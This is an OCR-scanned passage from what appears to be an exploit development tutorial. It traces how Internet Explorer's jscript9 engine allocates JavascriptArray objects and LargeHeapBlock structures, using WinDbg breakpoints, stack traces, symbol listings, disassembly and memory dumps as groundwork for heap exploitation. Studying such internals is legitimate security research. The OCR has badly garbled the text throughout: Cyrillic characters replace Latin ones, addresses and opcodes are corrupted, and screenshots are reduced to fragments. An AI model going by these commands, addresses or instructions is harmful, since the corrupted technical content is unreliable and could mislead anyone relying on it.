The creation of the array (its data, to Бе exact) can бе logged with the following breakpoint: 


бр jscript9+c2c47 ".printf "new Array Data: addr = 0x%p\\n\",eax;g" 





Note that we need to escape the double quotes and the back slash because ме’ге already inside a string. 
Also, the command g (go) is used to resume the execution after the breakpoint is triggered, because we 
want to print a message without stopping the execution. 


Let's get back to what we were doing. We set two hardware breakpoints and only the first was triggered, so 
let's get going. After we hit F5 one more time, the second breakpoint is triggered and the stack looks like 
this: 

0:007» k 20 

ChildEBP RetAddr 

0671bb8c 6ea82aae jscript9!Js::JavascriptArray::DirectSetltem Full-Ox40b < 

0671bc14 05f2074b jscript9! Js::JavascriptOperators::0P_SetElementl+0x1e0 

WARNING: Frame IP not in any known module. Following frames may be wrong. 

0671bc48 беа77461 0x5f2074b 

067 1bde4 6ea55cf5 jscript9! Js::InterpreterStackFrame::Process-*0x4b47 

0671bf2c O5f80fe9 jscript9! Us::InterpreterStackFrame::InterpreterT hunk<1>+0x305 

0671bf38 беа51160 Ox5f80fe9 

0671bfb8 6ea520ca jscript9! Js::JavascriptFunction::CallRootFunction+0x140 

067160 беа52097 jscript9!Js::JavascriptFunction::CallRootFunction+0x19 

0671с018 6ea52027 jscript9!ScriptSite::CallRootFunction+0x40 

0671c040 6eafdf75 jscript9!ScriptSite::Execute+0x61 


0671c0cc беаѓаб57 jscript9!ScriptEngine::ExecutePendingScripts+0Ox1e9 
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0671c154 6eafeO0b7 jscript9!ScriptEngine::ParseScriptT extCore+0x2ad 
0671с1а8 O069cb60c jscript9! ScriptEngine::ParseScriptT ext+0x5b 
0671c1e0 069c945d MSHTML!CActiveScriptHolder::ParseScriptT ext+0x42 
0671с230 06900521 MSHTML!CJScript9Holder::ParseScriptText+0x58 
0671с2а4 069ссба4 MSHTML!CScriptCollection::ParseScriptT ext+0x1f0 
0671c394 069cc242 MSHTML!CScriptData::CommitCode-*0x36e 
0671с40с 069cbe6e MSHTML!CScriptData::Execute-* 0233 

0671c420 069c9b49 MSHTML!CHtmScriptParseCtx::Execute+0x89 
0671c498 067d77cc MSHTML!CHtmParseBase::Execute+0x1 7c 
0671c4c4 755862fa MSHTML!CHtmPost::Broadcast+0x88 

0671c5c4 069c3273 user32!InternalCallWinProc*0x23 

0671c5dc 069c31ff MSHTML!CHtmPost::Run*0x1c 

0671c5f4 069c34f3 MSHTML!PostManExecute+0x5f 

0671c610 069c34b2 MSHTML!PostManResume+0x7b 

0671c650 06830dc9 MSHTML!CHtmPost::OnDwnChanCallback+0x3a 
0671c660 0677866c MSHTML!CDwnChan::OnMethodCall+0x19 
0671c6b4 067784fa MSHTML!GlobalWndOnMethodCall+0x169 
0671c700 755862fa MSHTML!GlobalWndProc+0xd7 

0671c72c 75586d3a user32!InternalCallWinProc+0x23 

0671c7a4 755877c4 user32!UserCallWinProcCheckWow+0x109 
0671с804 7558788a user32! DispatchMessageWorker+0x3bc 





By comparing the last two stack traces, we can see that we're still in the same call of 
jecript9!Js::JavascriptArray::DirectSetltem Full. So, DirectSetltem Full first allocates a block of 0x1010 
bytes through jscript9!Recycler::AllocZero and then initializes the object. 


But if all this happens inside jscript9!Js::JavascriptArray::DirectSetltem Full, then the JavascriptArray 
instance has already been created. Let's try to break on the constructor. First let's make sure that it exists: 
0:007? x jscript9! Js::JavascriptArray::JavascriptArray 

6ea898d6 jscript9!Js::JavascriptArray::JavascriptArray («no parameter info?) 


6ead481d jscript9!Js::JavascriptArray::JavascriptArray («no parameter info?) 


6eb28b61 jscript9!Js::JavascriptArray::JavascriptArray («no parameter info?) 





We got three addresses. 
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Let's delete the previous breakpoints with bc *, hit F5 and reload the page in IE. At the first dialog box, let's 
go back in WinDbg. Now let’s put a breakpoint at each one of the three addresses: 


0:006> bp 6ea898d6 
0:006> bp 6ead481d 
0:006> bp 6eb28b61 
0:006> bl 


Ое 6ea898d6 0001 (0001) 0:**** jscript9! Js::JavascriptArray::JavascriptArray 
1 e6ead481d 0001 (0001) 0:**** jscript9!Js::JavascriptArray::JavascriptArray 
2 е беб28661 0001 (0001) 0:**** jscript9!Js::JavascriptArray::JavascriptArray 





Hit FS and close the dialog бох. Mmm... the Done dialog бох appears and попе of our breakpoints is 
triggered. How odd... 


Let's see if we find something interesting in the list of symbols: 


0:006» x jscript9! Js::JavascriptArray::* 

6ec61e36 jscript9!Js::JavascriptArray::lsEnumerable («no parameter info?) 

беаб 71 jscript9!Js::JavascriptArray::GetFromIndex («no parameter info?) 

6ec31bed jscript9!Js::JavascriptArray::BigIndex::BigIndex (<no parameter info>) 
6ec300ee jscript9!Js::JavascriptArray::SetEnumerable (<no parameter info>) 
6eb94bd9 jscript9!Js::JavascriptArray::EntrySome («no parameter info») 

беасе48с jscript9! Js::JavascriptArray::Hasltem («no parameter info?) 

беа42530 jscript9!Js::JavascriptArray:: vftable' = «no type information? 

6ec31a2f jscript9! Js::JavascriptArray::BigIndex::Setltem («no parameter info>) 
6ec301d1 jscript9!Js::JavascriptArray::IsDirectAccessArray («no parameter info?) 
6eacab83 jscript9!Js::JavascriptArray::Sort (<no parameter info>) 

беса5500 jscript9!Js::JavascriptArray::EntryInfo::Map = «no type information? 
6eb66721 jscript9!Js::JavascriptArray::EntrylsArray («no parameter info?) 

6ec2fd64 jscript9! Js::JavascriptArray::GetDiagValueString (<no parameter info>) 
6ec2faeb jscript9! Js::JavascriptArray::GetNonIndexEnumerator («no parameter info?) 
6ec3043a jscript9!Js::JavascriptArray::Unshift«Js::JavascriptArray::BigIndex» («no parameter info?) 


6eb4ba72 jscript9!Js::JavascriptArray::EntryReverse («no parameter info») 


6eaed10f jscript9!Js::JavascriptArray::SetLength («no parameter info») 


6eacaadf jscript9! Js::JavascriptArray::EntrySort (<no parameter info>) 


6ec306c9 jscript9! Js::JavascriptArray::ToLocaleString<Js::JavascriptArray> (<no parameter info>) 
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беб5 се jscript9! Js::JavascriptArray::BuildSegmentMap («no parameter info») 

6ec2fef5 jscript9!Js::JavascriptArray::Freeze (<no parameter info>) 

6ec31c5f jscript9!Js::JavascriptArray::GetLocaleSeparator (<no parameter info>) 

6ecd54f0 jscript9!Js::JavascriptArray::Entrylnfo::LastIndexOf = «no type information? 
6eb9b990 jscript9!Js::JavascriptArray::EntryUnshift («no parameter info?) 

6ec30859 jscript9!Js::JavascriptArray::ObjectSpliceHelper<unsigned int» («no parameter info») 
6ec31ab5 jscript9!Js::JavascriptArray::Biglndex::operator* («no parameter info?) 

6ea898d6 jscript9!Js::JavascriptArray::JavascriptArray («no parameter info?) 

беб51815 jscript9!Js::JavascriptArray::ArrayElementEnumerator::ArrayElementEnumerator («no parameter info?) 
6ec30257 jscript9!Js::JavascriptArray::IndexTrace<unsigned int>::Setltem («no parameter info?) 
6ead481d jscript9!Js::JavascriptArray::JavascriptArray («no parameter info?) 

6eac281d jscript9!Js::JavascriptArray::ConcatArgs<unsigned int» («no parameter info?) 
беса5510 jscript9!Js::JavascriptArray::EntryInfo::Reduce = «no type information? 

6ea9bf88 jscript9!Js::JavascriptArray::DirectSetltem Full («no parameter info?) 

6eb9d5ee jscript9!Js::JavascriptArray::EntryConcat («no parameter info?) 

6ecd5490 jscript9!Js::JavascriptArray::EntryInfo::ToString = «no type information? 

бер49е52 jscript9!Js::JavascriptArray::GetEnumerator («no parameter info») 

6ecd5430 jscript9!Js::JavascriptArray::EntryInfo::Reverse = «no type information? 

бебббстт jscript9!Js::JavascriptArray::EntrylndexOf («no parameter info?) 

6eb93fa5 jscript9!Js::JavascriptArray::EntryEvery («no parameter info?) 

беса53е0 jscript9!Js::JavascriptArray::EntryInfo::IsArray = «no type information? 


6ec31e6d jscript9!Js::JavascriptArray::JoinOtherHelper («no parameter info?) 


6ec31d73 jscript9!Js::JavascriptArray::sort («no parameter info>) 


6eb94d8c jscript9!Js::JavascriptArray::EntryFilter («no parameter info?) 

6ec32052 jscript9!Js::JavascriptArray::EntryToLocaleString («no parameter info?) 

бесб1е52 jscript9!Js::JavascriptArray::IsConfigurable («no parameter info?) 

6ecd5410 jscript9!Js::JavascriptArray::EntrylInfo::Join = «no type information? 

6ec31d56 jscript9!Js::JavascriptArray::CompareElements («no parameter info») 

6eb5f989 jscript9!Js::JavascriptArray::InternalCopyArrayElements<unsigned int» («no parameter info?) 
беае!ба1 jscript9!Js::JavascriptArray::IsltemEnumerable («no parameter info?) 

6eb9d4cb jscript9!Js::JavascriptArray::EntrySplice («no parameter info?) 


57515161740) jscript9! Js::JavascriptArray::EntryToString («no parameter info?) 
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беб51956 jscript9!Js::JavascriptArray::CopyArrayElements («no parameter info?) 
6ec325e0 jscript9!Js::JavascriptArray::PrepareDetach («no parameter info>) 


беса5зѓғо jscript9! Js::JavascriptArray::EntryInfo::Push = «no type information? 


6ec30a8b jscript9!Js::JavascriptArray::ObjectSpliceHelpersJs::JavascriptArray::BigIndex» («no parameter info?) 


6ec301f7 jscript9! Js::JavascriptArray::DirectSetltemIfNotExist («no parameter info?) 
бесз0083 jscript9!Js::JavascriptArray::SetWritable («no parameter info?) 

бесз0019 jscript9!Js::JavascriptArray::SetConfigurable («no parameter info?) 
6ec31b1id jscript9!Js::JavascriptArray::Biglndex::operator++ («no parameter info?) 
беса5460 jscript9!Js::JavascriptArray::EntryInfo::IndexOf = «no type information? 
беба1498 jscript9!Js::JavascriptArray::EntryPush («no parameter info?) 

беса5460 jscript9!Js::JavascriptArray::Entrylnfo::Sort = «no type information? 
6ec2fcbb jscript9!Js::JavascriptArray::SetltemAttributes («no parameter info?) 
6ea8497f jscript9!Js::JavascriptArray::ArrayElementEnumerator::Init («no parameter info?) 
6ecd5350 jscript9!Js::JavascriptArray::Entrylnfo::NewInstance = «no type information? 
беас0596 jscript9!Js::JavascriptArray::EntryPop («no parameter info?) 

беа8в2123 jscript9!Js::JavascriptArray::Getltem («no parameter info?) 

6ec2ffb1 jscript9! Js::JavascriptArray::SetAttributes («no parameter info?) 

беае7 186 jscript9!Js::JavascriptArray::GetltemReference («no parameter info?) 
6ec2fd46 jscript9! Js::JavascriptArray::GetDiagT ypeString («no parameter info?) 
бебб1889 jscript9!Js::JavascriptArray::Deleteltem («no parameter info?) 

6ecd5450 jscript9!Js::JavascriptArray::EntryInfo::Slice = «no type information? 
6ec319be jscript9!Js::JavascriptArray::Biglndex::SetltemIfNotExist («no parameter info?) 
беса5530 jscript9!Js::JavascriptArray::EntryInfo::Some = «no type information? 
6eb16a13 jscript9!Js::JavascriptArray::EntryJoin («no parameter info?) 

беса5470 jscript9!Js::JavascriptArray::EntryInfo::Splice = «no type information? 
6ec2fc89 jscript9!Js::JavascriptArray::SetltemAccessors («no parameter info?) 

бес2 та jscript9! Js::JavascriptArray::Seal («no parameter info?) 

6eb5b713 jscript9!Js::JavascriptArray::GetltemSetter («no parameter info?) 

6eb49dcO jscript9!Js::JavascriptArray::GetEnumerator («no parameter info») 


6ec30284 jscript9!Js::JavascriptArray::InternalCopyArrayElements<Js: :JavascriptArray::Bigindex> («no parameter inf 
о>) 


6ec318bb jscript9!Js::JavascriptArray::Biglndex::Deleteltem («no parameter info?) 
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6eb94158 jscript9!Js::JavascriptArray::EntryLastIndexOf («no parameter info?) 
беба4606 jscript9!Js::JavascriptArray::Newlnstance («no parameter info») < 
беса5520 jscript9!Js::JavascriptArray::EntryInfo::ReduceRight = «no type information? 
беса54е0 jscript9!Js::JavascriptArray::EntryInfo::ForEach = «no type information? 
6ec31d27 jscript9!Js::JavascriptArray::EnforceCompatModeRestrictions («no parameter info?) 
беса5440 jscript9!Js::JavascriptArray::EntryInfo::Shift = «no type information? 
6eab5de1 jscript9!Js::JavascriptArray::SetProperty (<no parameter info>) 

бес95400 jscript9!Js::JavascriptArray::EntryInfo::Concat = «no type information? 
6ea5b329 jscript9!Js::JavascriptArray::GetProperty («no parameter info?) 

бес2 143 jscript9! Js::JavascriptArray::SetAccessors («no parameter info?) 

бес2їсеа jscript9!Js::JavascriptArray::SetltemWithAttributes («no parameter info?) 
6ea4768d jscript9!Js::JavascriptArray::IsObjectArrayFrozen («no parameter info?) 
6eae0c2c jscript9!Js::JavascriptArray::GetNextlndex («no parameter info») 

6eab5c21 jscript9!Js::JavascriptArray::ls («no parameter info?) 

6ec3177e jscript9!Js::JavascriptArray::CopyArrayElements («no parameter info?) 
6ec3251d jscript9!Js::JavascriptArray::SetLength («no parameter info?) 

6eb28b61 jscript9!Js::JavascriptArray::JavascriptArray («no parameter info>) 
6eaeb83a jscript9!Js::JavascriptArray::ArraySpliceHelper («no parameter info?) 
беасЗа16 jscript9!Js::JavascriptArray::AllocateHead («no parameter info?) 

Geaffed4 jscript9!Js::JavascriptArray::SetPropertyWithAttributes («no parameter info?) 
6ead00ce jscript9!Js::JavascriptArray::HasProperty («no parameter info?) 

6ecd54d0 jscript9!Js::JavascriptArray::Entrylnfo::Filter = «no type information? 
бес3190Г jscript9! Js::JavascriptArray::BigIndex::Setltem («no parameter info?) 
6eae60d3 jscript9!Js::JavascriptArray::EntryMap («no parameter info») 

6eb16a9c jscript9!Js::JavascriptArray::JoinHelper («no parameter info?) 

6ec31b46 jscript9!Js::JavascriptArray::Biglndex::ToNumber (<no parameter info>) 
6ea84a80 jscript9!Js::JavascriptArray::ArrayElementEnumerator::ArrayElementEnumerator («no parameter info?) 
6ea8495b jscript9!Js::JavascriptArray::IsAnyArrayTypeld («no parameter info?) 


6ec2fd1c jscript9!Js::JavascriptArray::GetS pecialNonEnumerablePropertyName («no parameter info?) 


6ec31bd5 jscript9!Js::JavascriptArray::Biglndex::IsSmalllndex («no parameter info») 


беба157а jscript9!Js::JavascriptArray::EntryForEach («no parameter info?) 


6ea83044 jscript9!Js::JavascriptArray::Setltem («no parameter info?) 
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6ec3050a jscript9!Js::JavascriptArray::ToLocaleString<Js::RecyclableObject> («no parameter info?) 
беа534е0 jscript9!Js::JavascriptArray::DirectGetltemAt («no parameter info») 

беса5420 jscript9!Js::JavascriptArray::EntryInfo::Pop = «no type information? 

6ea59b2d jscript9!Js::JavascriptArray::ForlnLoop («no parameter info?) 

беа 78 jscript9! Js::JavascriptArray::GetSetter («no parameter info?) 

6eb4ec30 jscript9!Js::JavascriptArray::ArraySegmentSpliceHelper («no parameter info?) 
6eb78e45 jscript9!Js::JavascriptArray::EntryReduce («no parameter info») 

6eb6697d jscript9!Js::JavascriptArray::DirectGetltemAtFull («no parameter info?) 
6ec32167 jscript9!Js::JavascriptArray::EntryReduceRight («no parameter info?) 

беба7 171 jscript9!Js::JavascriptArray::EntryShift («no parameter info?) 

6eb99706 jscript9!Js::JavascriptArray::MarshalToScriptContext («no parameter info>) 
6ecd54c0 jscript9! Js::JavascriptArray::EntryInfo::Every = «no type information? 
6ec3196b jscript9!Js::JavascriptArray::Biglndex::Deleteltem («no parameter info?) 
575197601672) jscript9!Js::JavascriptArray::PreventExtensions («no parameter info?) 
6ecd5480 jscript9!Js::JavascriptArray::EntryInfo::ToLocaleString = «no type information? 
6eb93f8b jscript9!Js::JavascriptArray::DeleteProperty («no parameter info») 

бесзозбд jscript9!Js::JavascriptArray::Unshift<unsigned int» («no parameter info?) 
6ea849d5 jscript9!Js::JavascriptArray::FillFromPrototypes («no parameter info?) 
6eadb3cf jscript9! Js::JavascriptArray::GetPropertyReference (<no parameter info>) 


6ec317e1 jscript9!Js::JavascriptArray::TruncateToProperties («no parameter info?) 


6eabfc81 jscript9! Js::JavascriptArray::EntrySlice (<no parameter info>) 


беае2060 jscript9!Js::JavascriptArray::JoinToString («no parameter info?) 

6ec30ca8s jscript9! Js::JavascriptArray::ConcatArgs<Js::JavascriptArray::Biglndex> («no parameter info?) 
беа5с26е jscript9!Js::JavascriptArray::OP_NewScArray («no parameter info?) 

6eb1682e jscript9!Js::JavascriptArray::JoinArrayHelper («no parameter info?) 

6ec31f63 jscript9! Js::JavascriptArray::GetFromLastIndex («no parameter info?) 

6eb618a1 jscript9!Js::JavascriptArray::DirectDeleteltemAt («no parameter info?) 

6ead497d jscript9!Js::JavascriptArray::MakeCopyOnWriteObject («no parameter info?) 

6eb4c512 jscript9!Js::JavascriptArray::EnsureHeadStartsFromZero («no parameter info?) 

6ec31c24 jscript9! Js::JavascriptArray::ToLocaleStringHelper («no parameter info?) 

беаеббеб jscript9!Js::JavascriptArray::GetBeginLookupSegment (<no parameter info>) 


беса54а0 jscript9!Js::JavascriptArray::EntryInfo::Unshift = «no type information? 
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This line looks promising: 


беба4606 jscript9!Js::JavascriptArray::NewInstance («no parameter info>) 





Let's put a breakpoint on it and let's see if this time we're lucky. 


0:006? Бс“ 
0:006» bp jscript9! Js::JavascriptArray::NewInstance 





Close the dialog box in IE, reload the page and close the starting dialog. This time everything goes 
according to plans: 


(28! Pid 4612 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 
err? |ы EI EI 8 & OO | 7 Ад | 15] 


Previous || 


nv up еі 
b 





1л0,Со10 SysO:«Local- Proc 00031204 Thrd 007. 


Ву stepping through the code ме get {о the following piece of code: 


6eb02a3c 682870a46e push offset jscript9!Recycler::Alloc (6ea47028) 
6eb02a41 #770с push dword ptr [edi OCh] 


6eb02a44 6a20 push 20h 
6eb02a46 e84546f4ff call jscript9!operator new<Recycler> (6ea47090) 
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6eb02a4b 8bf0 mov esi,eax < ESI = allocated block 

6eb02a4d 83c40c add  esp,0Ch 

6eb02a50 85f6 test esi,esi 

6eb02a52 0f841d210a00 је ;jscript9!Js::JavascriptArray::NewInstance*0x390 (6eba4b75) 
6eb02a58 8b8f00010000 тоу ecx,dword ptr [edi+100h] 

6eb02a5e 894е04 mov dword ptr [esi+4],ecx 


6eb02a61 с7066021а46е mov dword ptr [esi], offset jscript9!Js::DynamicObject:: vftable' (6ea42fbO) 
6eb02a67 с7460800000000 том dword ри [е5!+8],0 

бебогабе с7460с01000000 том dword ptr [еѕі+ОоСћ],1 

6eb02a75 8b4118 mov eax,dword ptr [ecx+18h] 

беБ02а78 8а4005 mov  al,byte ptr [еах+5] 





The operator new is called as follows: 
operator new(20h, arg, јаспр! Кесусјег::АЛос); 
Let's look at the code of the operator new: 


jscript9!operator new<Recycler>: 

беа47090 8bff mov  edi,edi 

6ea47092 55 push ебр 

беа4 7093 8рес mov  ebp,esp 

6ea47095 #7508 push dword ptr [ebp+8] < push 20h 

беа47098 8b4d0c mov есх,амога ptr [ebp+0Ch] 

6ea4709b ff5510 са! dword ptr [ebp+10h] < call jscript9!Recycler::Alloc 
6ea4709e 5d pop  ebp 

беа4 7091 c3 ret 





Let’s go back to the main code: 


6eb02a3c 682870a46e push offset jscript9!Recycler::Alloc (6ea47028) 
6eb02a41 ff770c push dword ptr [еаі+осһ] 
6eb02a44 6a20 push 20h 


6eb02a46 e84546f4ff _ call jscript9!operator new<Recycler> (беа47090) 
6eb02a4b врто том esi,eax < ESI = allocated block 
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6eb02a4d 83c40c add  esp,0Ch 

6eb02a50 85f6 test esi,esi 

6eb02a52 0f841d210a00 је  ;jscript9!Js::JavascriptArray::NewInstance*0x390 (6eba4b75) 
6eb02a58 8b8f00010000 тоу ecx,dword ptr [edi+100h] 

6eb02a5e 894е04 mov  dword ptr [esi+4],ecx 

6eb02a61 c706b02fa46e том  dword ptr [esi],offset jscript9!Js::DynamicObject:: vftable' (6ea42fb0) 
бебо2габ7 с7460800000000 том dword ри [еѕі+8],0 

бебогабе c7460c01000000 том dword ptr [esi+OCh],1 

6eb02a75 8b4118 mov eax,dword ptr [ecx+18h] 

6eb02a78 8a4005 mov  albyte ptr [еах+5] 

6eb02a7b a808 test al,8 

6eb02a/d 0185е8200а00 jne  jscript9!Js::JavascriptArray::NewInstance+0x386 (6eba4b6b) 
6eb02a83 b803000000 тоу eax,3 

6eb02a88 89460c mov dword ptr [esi-OCh],eax 

6eb02a8b 864104 том еах,дмога ріг [есх+4] 45:0026:060е9а64=060%000 

6eb02a8e 8b4004 mov eax,dword ptr [eax+4] 

6eb02a91 8b4918 mov  ecx,dword ptr [есх+18һ] 

6eb02a94 8bb864040000 тоу  edi,dword ptr [eax*464h] 

6eb02a9a 8b01 mov  eax,dword ptr [ecx] 

6eb02a9c ff5014 call dword ptr [eax* 14h] 

6eb02a9f 8b4e04 mov  ecx,dword ptr [esi+4] 

6eb02aa2 8b4918 mov ecx,dword ptr [ecx+18h] 

6eb02aa5 8b4908 mov есх,дмога ptr [ecx+8] 

6eb02aa8 3bc1 cmp еах,есх 

6eb02aaa Of8f0d9f1900 ја jscript9!memset+0x31562 (6ec9c9bd) 

бебогабо 864604 mov  eax,dword ptr [е51+4] 

6eb02ab3 c7063025a46e том омога ptr [esi],offset jscript9!Js::JavascriptArray:: vftable’ (беа4 2530) 
бебогабд с7461200000000 том dword ptr [јез + (01:10) 

6eb02ac0 8b4004 том еах,дмога ptr [eax+4] 





The important instruction is 


6eb02ab3 c7063025a46e том  dword ptr [esi],offset jscript9!Js::JavascriptArray:: vftable' (6ea42530) 
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which overwrites the first dword of the block of memory with the vftable of a JavascriptArray. 


Then another important part of code follows: 


6eb02ac3 8b4004 mov  eax,dword ptr [eax+4] 

беБ02асб 868864040000 тоу есх,амога ptr [еах+464ћ] 

беб02асс ба50 push 50h 50h bytes? 

бер02асе c7461000000000 тоу "ето ptr [esi+10h],0 

6eb02ad5 e80769f4ff call jscript9!Recycler::AllocZero (беа493е1) allocates a block 
беб02ада с70000000000 тоу dword ри [еах],0 

бер02ае0 с7400400000000 том амуога ри [еах+4],0 

бер02ает с7400810000000 том dword pir [eax+8],10h 

берогаее с74002с00000000 том ето ри [еах+0Сһ],0 

Geb02af5 894618 mov  dword ptr [esi+18h],eax < look at the following picture 


GebO02af8 894614 mov  dword ptr [esi+14h],eax < look at the following picture 
6ebO2afb е951200а00 jmp _ jscript9!Js::JavascriptArray::Newlnstance+0x24f (6eba4b51) 





The following picture shows what happens in the piece of code above: 


http: //expdev-kiuhnm.rhcloud.com 





23142 





fe Pid 4612 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 
n| mt uw | EX Ed kal E ET 


Шы 


| Previous || Next | i 23949340 Display format: | Lc Previous 


ray: -NewInstance+0x2d4f (beba4b51 


iptArray 


iptAr 


vftable' 


їл0,С010 Sy al> Ргос 000:1204 Thrd00712e4 ASM О -APS NUM 





Now we have two important addresses: 


239d9340 address of the JavascriptArray 


2c1460a0 structure pointed to by the JavascriptArray 





Let's delete the breakpoint and resume program execution. When the dialog box pops up, go back to 


WinDbg. Now break the execution in WinDbg and have another look at the address : 
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Æ Pid 4612 - WinDbg:6.3.9600.16384 X86 
File Edit View Debug Window Help 
> б (eR Fr) 5 | ORDO 9 OF) (es) Aa ч 


Offset: 


ҚҰЗ JavascriptArray data structure 
for the array 'a' (look at the 


Javascript code) 


Previous 


[esp+2DCh] 


dword ptr 
rd ptr Ё 


пу пре 
b 


This array contains 
10000h references to 
other arrays 


jscript9!Js 


ocal> Proc 00031204 





As we can see, now our (at offsets and ) points to a different address. Because a 
is growable, it's likely that when a bigger buffer is allocated the two pointers at and 
are updated to refer to the new buffer. We can also see that the at 
corresponds to the array a in the javascript code. Indeed, it contains references to other arrays. 


We saw that the object is allocated іп Е 


6eb02a46 e84546f4ff _ call jscript9!operator new<Recycler> (беа47090) <------------------- 
6eb02a4b 8bf0 mov  esi,eax <--------- ESI = allocated block 





If at this point we return from by pressing , we see the 
following code: 


6ea125cc #75ес push dword ptr [ebp-14h] 
6ea125cf ff75e8 push dword ptr [ebp-18h] 


6ea125d2 ff55e4 call dword ptr [ebp-1Ch] (jscript9!Js::JavascriptArray::Newlnstance) 
6ea125d5 8b65e0 mov  esp,dword ptr [ebp-20h] ss:002b:04d2c0e0-04d2c0c4 





After the call to 1 points to the structure. So, we can put a breakpoint 
either at or at . Let’s choose the latter: 
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bp jscript9+425d5 ".printf \"new Array: addr = Ox%p\\n\"",eax;g" 





Here's what we discovered so far: 


bp jscript9! Js::JavascriptArray::NewInstance 
bp jscript9+425d5 "printf "new Array: addr = 0х%р\\п\",еах;0" 


jscript9!Js::JavascriptArray:: vftable' (allocated through jscript9!operator new<Recycler> ==> 


jscript9!Recycler::Alloc) 


00000003 
00| 10Ёа010 210Ға010) 00000000 


bp jscript9+c2c47 " printf \"new Array Data: addr = 
Ox%p\\n\" eax;g" 


(allocated through jscript9!Recycler::AllocZero) 


тә 4| allocation header 
2 object header 


array length reserved length 





LargeHeapBlock 
What is a ? Let's try to find some related symbols: 


0:007> x jscript9!*largeheapblock* 

efe96af3 jscript9!HeapInfo::DeleteLargeHeapBlockList (<no parameter info>) 
6f5d654d jscript9! HeapInfo::ReinsertLargeHeapBlock (<no parameter info>) 
6f6a8699 jscript9!LargeHeapBlock::SweepObjects<2> (<no parameter info>) 
515516107614 jscript9!LargeHeapBlock::lsValidObject (<no parameter info>) 


6f6a82a8 jscript9!LargeHeapBlock::SweepObjects<1> (<no parameter info>) 


6f755d4d jscript9!LargeHeapBlock::GetHeader (<no parameter info>) 








317 http: //expdev-kiuhnm.rhcloud.com 





EXPLOTT DEVELOPMENT COMMUNITY 


6f5a160e jscript9!LargeHeapBlock::ResetMarks (<no parameter info>) 
6f5a0672 jscript9!LargeHeapBlock::Rescan (<no parameter info>) 

6f59f32F jscript9!LargeHeapBlock::lsObjectMarked (<no parameter info>) 
ef59a7ca jscript9! HeapInfo::AddLargeHeapBlock (<по parameter info>) 
6f657a87 jscript9!LargeHeapBlock::AddObjectToFreeList (<no parameter info>) 


6f755f80 jscript9!LargeHeapBlock::Alloc (<no parameter info>) 


6f755dba jscript9!LargeHeapBlock::GetObjectHeader (<no parameter info>) 

61755543 jscript9! HeapBucket::EnumerateObjects<LargeHeapBlock> (<no parameter info>) 
6f755daf jscript9!LargeHeapBlock::GetRealAddressFromInterior («no parameter info?) 
6f755dee jscript9!LargeHeapBlock::SetMemoryProfilerOldObjectBit (<no parameter info>) 
6f755d9b 1Е 61416121 агдеНеарВ!оск:: бе! Објес те (<по parameter info>) 

6f5a096b jscript9! HeapInfo::Rescan<LargeHeapBlock> (<no parameter info>) 

6f696b24 jscript9!LargeHeapBlock::ReleasePagesShutdown (<no parameter info>) 
6f755e23 jscript9!LargeHeapBlock::SetObjectMarkecBit (<no parameter info>) 

6f755eaf jscript9!LargeHeapBlock::FinalizeObjects (<no parameter info>) 

6f59ef52 jscript9!LargeHeapBlock::SweepObjects<0> (<no parameter info>) 

6f755e66 jscript9!LargeHeapBlock::TestObjectMarkedBit (<no parameter info>) 

6f755daf jscript9!LargeHeapBlock::MarkInterior (<no parameter info>) 

6f596e18 jscript9!LargeHeapBlock:: vftable' = <no type information> 





Here are the most promising functions: 


6f59a7ca jscript9! HeapInfo::AddLargeHeapBlock (<no parameter info>) 
6f755f80 jscript9!LargeHeapBlock::Alloc (<no parameter info>) 





Let’s put a breakpoint on both of them and reload the page in IE. When we close the Start dialog box, the 
first breakpoint is triggered and we end up here: 

6f59a7c5 90 пор 

6159а7сб 90 nop 

6f59a7c7 90 nop 

6f59a7c8 90 nop 

ef59a7c9 90 nop 


jscript9!Heaplnfo::AddLargeHeapBlock: 


6f59a7ca 8bff mov  edi,edi we are here 
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6f59a7cc 55 push ебр 


6f59a7cd 8bec mov  ebp,esp 

6f59a7cf 8Зес1с sub  esp,1Ch 

6f59a7d2 53 push ebx 

6f59a7d3 56 ризћ esi 

6f59a7d4 8b750c тоу esi,dword ptr [ebp+0Ch] 





Let’s also look at the stack trace: 


0:007» К 10 

ChildEBP RetAddr 

04dbbc90 6f59a74d jscript9! HeapInfo::AddLargeHeapBlock 

04dbbcb4 6f5a72d8 jscript9!Recycler::LargeAlloc+0Ox66 

04dbbcd0 6f652c47 jscript9! Recycler::AllocZerot+0x91 

04dbbd10 6f5d2aae jscript9!Js::JavascriptArray::DirectSetltem_Full+Ox3fd 
044966998 6f5fed13 jscript9!Js::JavascriptOperators::OP_SetElementl+0x1e0 
O4dbbf34 6f5a5cf5 jscript9! Js::InterpreterStackFrame::Process-*0x3579 
04dbc084 O3fdOfe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk«12-0x305 
WARNING: Frame IP not in any known module. Following frames may be wrong. 
04dbc090 6f5a1f60 Ox3fdOfe9 

04dbc110 6f5a20ca jscript9! Js::JavascriptFunction::CallRootFunction+0x140 
04dbc128 6f5a209F jscript9! Js::JavascriptFunction::CallRootFunction+0x19 
04dbc170 6f5a2027 jscript9!ScriptSite::CallRootFunction+0x40 

04dbc198 6f64df75 jscript9!ScriptSite::Execute+0x61 

04dbc224 6f64db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9 
04dbc2ac 6f64e0b7 jscript9! ScriptEngine::ParseScriptT extCore+Ox2ad 
04dbc300 6e2db60c jscript9! ScriptEngine::ParseScriptT ext+Ox5b 

04dbc338 6e2d945d MSHTML!CActiveScriptHolder::ParseScriptT ext+0x42 





Very interesting! A LargeHeapBlock is created by LargeAlloc (called by AllocZero) when the first item of a 
JavascriptArray is assigned to. Let's return from AddLargeHeapBlock by pressing Shift+F 11 and look at the 
memory pointed to by EAX: 


0:007» dd eax 


25їсре80 61596е18 00000003 04661000 00000002 
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25fcbe90 00000000 00000000 00000004 04661000 
25їсреа0 04663000 25їсрее0 00000000 00000000 
25fcbeb0 00000000 00000000 04222е98 00000000 
25їсрес0 00000000 00000000 00000000 00000004 
25їсбеао 00000000 00000000 734а1523 8с000000 
25їсрее0 6f596e18 00000003 046абооо 00000003 


25fcbefO 00000002 00000000 00000004 04628820 

0:007? In poi(eax) 

(6f596e18) jscript9!LargeHeapBlock:: vftable' | (6f596e3c) jscript9!PageSegment:: vftable'’ 
Exact matches: 


jscript9!LargeHeapBlock:: vftable' = «no type information? 





So, EAX points to the LargeHeapBlock just created. Let's see if this block was allocated directly on the 
heap: 
0:007> !heap -p -a @eax 

